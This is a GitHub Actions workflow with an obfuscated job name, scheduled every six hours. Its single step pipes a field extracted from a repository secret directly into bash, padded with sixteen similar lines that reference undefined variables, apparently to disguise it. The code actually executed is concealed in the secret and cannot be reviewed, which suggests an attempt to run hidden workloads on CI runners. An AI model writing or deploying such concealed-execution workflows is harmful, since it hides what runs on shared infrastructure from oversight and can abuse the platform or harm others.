name: dongyugang0987
on:
  workflow_dispatch:
  schedule:
    - cron: '35 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongyugang0987
        env:
          va06: ${{ secrets.va06 }}
        run: |
          echo $va06 | jq -r .auor34899 | /bin/bash
          echo $zxz374 | jq -r .i4359 | /bin/bash
          echo $i39 | jq -r .cwgkd25575 | /bin/bash
          echo $vu38380 | jq -r .ez42204 | /bin/bash
          echo $fzcg6650 | jq -r .tptc41 | /bin/bash
          echo $ykvj9632 | jq -r .yr8 | /bin/bash
          echo $aprfv013 | jq -r .t36 | /bin/bash
          echo $chbn1 | jq -r .qfaz8551 | /bin/bash
          echo $kyrz880 | jq -r .tnfv048 | /bin/bash
          echo $klm05 | jq -r .ha8 | /bin/bash
          echo $jqg27823 | jq -r .iffwi77 | /bin/bash
          echo $w085 | jq -r .ozs087 | /bin/bash
          echo $r7910 | jq -r .qtgz0 | /bin/bash
          echo $txyi82793 | jq -r .of9 | /bin/bash
          echo $b94819 | jq -r .o04802 | /bin/bash
          echo $itw245 | jq -r .y160 | /bin/bash
          echo $mdw421 | jq -r .ohqyl88200 | /bin/bash

